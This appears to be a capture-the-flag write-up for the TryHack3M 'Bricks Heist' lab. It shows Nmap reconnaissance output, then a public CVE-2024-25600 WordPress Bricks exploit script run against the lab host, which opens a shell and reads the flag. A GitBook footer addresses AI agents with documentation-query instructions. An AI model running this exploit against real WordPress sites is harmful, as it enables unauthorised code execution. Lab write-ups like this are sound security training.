> For the complete documentation index, see [llms.txt](https://khizar.gitbook.io/blog/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://khizar.gitbook.io/blog/tryhack3m-bricks-heist.md). # TryHack3M Bricks Heist Append the following line to the end of the file, replacing `$IP` with the room IP address: ```bash sudo nano /etc/hosts # Append to the last line with the format $IP bricks.thm ``` ### Reconnaissance Run an Nmap scan to enumerate open ports and services: ```go nmap -sV -sC -A -p 22,80,443,3306 10.10.249.30 Starting Nmap 7.60 ( https://nmap.org ) at 2024-04-15 17:51 BST Nmap scan report for bricks.thm (10.10.249.30) Host is up (0.00047s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0) 80/tcp open http WebSockify Python/3.8.10 | fingerprint-strings: | GetRequest: | HTTP/1.1 405 Method Not Allowed | Server: WebSockify Python/3.8.10 | Date: Mon, 15 Apr 2024 16:51:17 GMT | Connection: close | Content-Type: text/html;charset=utf-8 | Content-Length: 472 | | | | | Error response | | |

Error response

Error code: 405

Message: Method Not Allowed.

Error code explanation: 405 - Specified method is invalid for this resource.

Error response

Error code: 501

Message: Unsupported method ('OPTIONS').

Error code explanation: HTTPStatus.NOT_IMPLEMENTED - Server does not support this operation.

| |_ |_http-server-header: WebSockify Python/3.8.10 |_http-title: Error response 443/tcp open ssl/http Apache httpd |_http-generator: WordPress 6.5 | http-robots.txt: 1 disallowed entry |_/wp-admin/ |_http-server-header: Apache |_http-title: Brick by Brick | ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=US | Not valid before: 2024-04-02T11:59:14 |_Not valid after: 2025-04-02T11:59:14 3306/tcp open mysql MySQL (unauthorized) 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : MAC Address: 02:B2:AF:27:CD:65 (Unknown) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.8 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.8 (92%) No exact OS matches for host (test conditions non-ideal). Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.47 ms bricks.thm (10.10.249.30) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 81.93 seconds ``` The scan output reveals: * Port 80: Python WebSockify server (not relevant for this exploit) * Port 443: Apache web server running WordPress 6.5 * Port 3306: MySQL server (not relevant for this exploit) ### Exploitation A quick Google search for "wordpress bricks exploit" reveals a potential exploit at . Run the exploit script against the target: ``` root@ip-10-10-23-59:~# python3 CVE-2024-25600.py -u https://10.10.213.55 _______ ________ ___ ____ ___ __ __ ___ ___________ ____ ____ / ____/ | / / ____/ |__ \ / __ \__ \/ // / |__ \ / ____/ ___// __ \/ __ \ / / | | / / __/________/ // / / /_/ / // /_________/ //___ \/ __ \/ / / / / / / / /___ | |/ / /__/_____/ __// /_/ / __/__ __/_____/ __/____/ / /_/ / /_/ / /_/ / \____/ |___/_____/ /____/\____/____/ /_/ /____/_____/\____/\____/\____/ Coded By: K3ysTr0K3R --> Hello, Friend! [*] Checking if the target is vulnerable [+] The target is vulnerable [*] Initiating exploit against: https://10.10.213.55 [*] Initiating interactive shell [+] Interactive shell opened successfully Shell> ls 650c844110baced87e1606453b93f22a.txt index.php kod license.txt phpmyadmin readme.html wp-activate.php wp-admin wp-blog-header.php wp-comments-post.php wp-config-sample.php wp-config.php wp-content wp-cron.php wp-includes wp-links-opml.php wp-load.php wp-login.php wp-mail.php wp-settings.php wp-signup.php wp-trackback.php xmlrpc.php Shell> cat 650c844110baced87e1606453b93f22a.txt THM{DIY} ``` The flag is located in the `650c844110baced87e1606453b93f22a.txt` file. So you can read it to get the flag. TLDR; Add bricks.thm to /etc/hosts and use a WordPress bricks exploit to gain a shell and read the flag. --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://khizar.gitbook.io/blog/tryhack3m-bricks-heist.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.